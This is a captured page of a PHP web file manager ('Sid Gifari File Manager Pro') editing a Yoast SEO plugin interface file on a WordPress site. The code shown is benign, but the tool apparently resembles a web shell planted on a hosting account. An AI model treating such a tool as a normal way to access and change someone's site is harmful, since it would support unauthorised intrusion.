🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-19 08:40:38 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
reenrihair.com
/
wp-content
/
plugins
/
wordpress-seo
/
src
/
ai-consent
/
application
📍 /home/therahul/reenrihair.com/wp-content/plugins/wordpress-seo/src/ai-consent/application
🔄 Refresh
✏️
Editing: consent-handler-interface.php
Writable
<?php namespace Yoast\WP\SEO\AI_Consent\Application; /** * Interface Consent_Handler_Interface * * This interface defines the methods for handling user consent. */ interface Consent_Handler_Interface { /** * Handles consent revoked by deleting the consent user metadata from the database. * * @param int $user_id The user ID. * * @return void */ public function revoke_consent( int $user_id ); /** * Handles consent granted by adding the consent user metadata to the database. * * @param int $user_id The user ID. * * @return void */ public function grant_consent( int $user_id ); }
💾 Save Changes
❌ Cancel